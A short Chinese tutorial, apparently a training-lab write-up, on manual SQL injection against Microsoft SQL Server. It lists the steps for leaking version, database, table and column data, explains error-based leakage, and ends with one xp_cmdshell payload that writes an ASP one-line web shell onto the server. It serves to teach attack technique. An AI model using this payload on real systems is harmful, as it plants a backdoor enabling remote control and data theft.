mssql注入是针对于sql server数据库的
sql server数据库和mysql数据库是有所区别的,语句命令之类的可自行百度。
平台:i春秋
内容:mssql手工注入
测试网站:www.test.com
找注入点
点击test
用数据类型转换爆错法
查看版本
原因:@@version是mssql 的全局变量,如果我们把它写成这样 and @@version, 那个后面的mssql就会强行把@@version 强行转换成数字,但是失败,所以就会将数据库信息暴露出来
爆当前数据库名
爆表名
爆列名
爆字段内容
Mssql基本注入成功
如果数据的权限是dba,且知道网站路径的话,那么我们就可以用这个语句来写一句话小马进去:
id=1;exec master..xp_cmdshell 'echo "<%@ LANGUAGE=VBSCRIPT %>;<%eval request(chr(35))%>''" > d:\KfSite\kaifeng\2.asp'--
原理是sql server 支持堆叠查询,利用xp_cmdshell 可以执行cmd指令,cmd指令中用【echo 内容 > 文件】 可以写文件到磁盘里面